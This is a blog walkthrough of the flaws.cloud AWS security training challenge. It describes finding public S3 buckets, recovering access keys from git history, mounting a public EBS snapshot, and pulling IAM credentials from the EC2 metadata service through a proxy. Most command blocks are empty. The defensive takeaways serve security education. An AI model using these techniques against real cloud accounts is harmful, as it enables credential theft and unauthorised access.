Cloud pentesting using the AWS platform and flaws web series to work through insecure S3 Buckets, Authentication, Metadata Services and accessing EC2 Instances.
Legal Notice && Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk. By continuing, you acknowledge the aforementioned user risk/responsibilities.
Through a series of levels you’ll learn about common mistakes and gotchas when using Amazon Web Services (AWS). There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues. A series of hints are provided that will teach you how to discover the info you’ll need. If you don’t want to actually run any commands, you can just keep following the hints which will give you the solution to the next level. At the start of each level you’ll learn how to avoid the problem the previous level exhibited. Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud.
Level 1 - Enumerate AWS
This level is buckets of fun. See if you can find the first sub-domain. Need a hint?
1 |
|
1 |
|
1 |
|
s3 bucket discovered at s3-website-us-west-2.amazonaws.com
S3 Bucket address translation http://flaws.cloud.s3-website-us-west-2.amazonaws.com/
Install AWS CLI
1 |
|
check for install with version check
1 |
|
Access S3 Bucket with AWS CLI
1 |
|
file secret-dd02c7c.html
looks interesting.
Navigate to secret http://flaws.cloud/secret-dd02c7c.html
Level 2 - Insecure S3 Buckets
Level 2 is at http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
Permissions within AWS S3 buckets have a default to private and secure but if buckets have been modified for Grantee as everyone anyone who accesses the URL will
Permission flaw: Everyone https://flaws.cloud.s3.amazonaws.com/
Creating a IAM user on AWS: Within AWS Dashboard search for IAM
Add user under “Users”
create Username and select access key:
attach to group in this case “AdminS3” to which can be created with “Create Group”
add additonal tags if need be for organization
Review and create user:
Important - the Secret Access Key will ONLY be displayed at this point and if lost will need to be regenerated.
Configure aws on linux
1 |
|
Enter AWS Access Key ID ###…### Enter AWS Secret Access Key ###…### Enter Region: us-east-1 Enter Default Output: json
default text file location with parameters can be found at:
1 |
|
Access S3 but with account
1 |
|
Level 3 - S3 Buckets Authenticated AWS Users
The next level is at http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
Similar to permissions to “Everyone” permissions can be set to “Any Authenticaed AWS User” which leaves the S3 bucket exposed as well.
This was an older setting and is no longer available in the webconsole but the SDK and third-party tools sometimes use it.
Find AWS Key
https://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud.s3.amazonaws.com/ Bucket contains an git config file:
Download entire s3 bucket locally
1 |
|
Inspect git log
1 |
|
Note that a comment of accident commit.
checkout git commit
1 |
|
performing a directory search access_keys.txt
is discovered
1 |
|
Configure new aws profile
1 |
|
List of files in s3 bucker are displayed
Level 4 - Creating snapshot - create instance loading snapshot
The next level is at http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
Note: Always roll keys if you suspect they were compromised..
For the next level, you need to get access to the web page running on an EC2 at 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud
Identify account ID
1 |
|
Account id: 975426262029
View ec3 backups
add us-west-2 region to ~/.aws/config
Describe Snapshots
1 |
|
Mount snapshot ID
1 |
|
ensure under AWS IAM that AdministratorAccess permissions is added to user - or failure may occur.
Launch EC2 new instance on us-west-2
Select “Free Tier”
Add Storage of snapshot created: snapshot storage name: snap-0b49342abd1bdcb89 set device: /dev/sdf
SSH to newly created instance
list drives:
1 |
|
view drive information
1 |
|
mount drive
1 |
|
Discover interesting file
within the /home/ubuntu
a file containing cleartext password is discovered:
setupNginx.sh
Login to web service http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/
utilizing discovered credientials and gained access to level 5
Level 5 - 169.254.169.254 Metadata Service
Good work getting in. This level is described at http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/
AWS cloud services inclue a metadata service that is housed at 169.254.169.254 and RFC-3927 describes exactly how the services functions.
Accessing Metadata Service of flaws.cloud http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/
Listing metadata events for EC2 Instance.
Latest Meta Data - Security Credentials http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
new set of Access + Secret Keys Identified along with a Token
1 |
|
Create Level5 AWS profile with credentials
within /.aws/credentials/
and /.aws/config
./aws/credentials:
Access level 6
1 |
|
Navigate to directory http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/
Level 6 - IAM Access Keys via EC2 User-data
Takeaway: Do not allow access to 169.254.169.254 by applications.
Access level 6 with keys provided keys to level 6
1 |
|
add to /.aws/credentials
Security Group Audiot
1 |
|
List policies attached to user
1 |
|
“list_apigateways” a custom policy created
View IAM policy
1 |
|
using ARN to view policy:
1 |
|
Policy is using “apigateway:GET” on the “arn:aws:apigateway:us-west-2::/restapis/*
Using apigateway to GET - List Lamda Functions
1 |
|
Get Policy for Lamda
1 |
|
The ability to execute arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6` That “s33ppypa75” is a rest-api-id
1 |
|
Stage name is “Prod” which are lamda functions using the rest-api-id, stage name, region and resource: https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
The End
http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/
Takeaways: Manage the permissions of everything and neer allow users to read metadata where permissions are.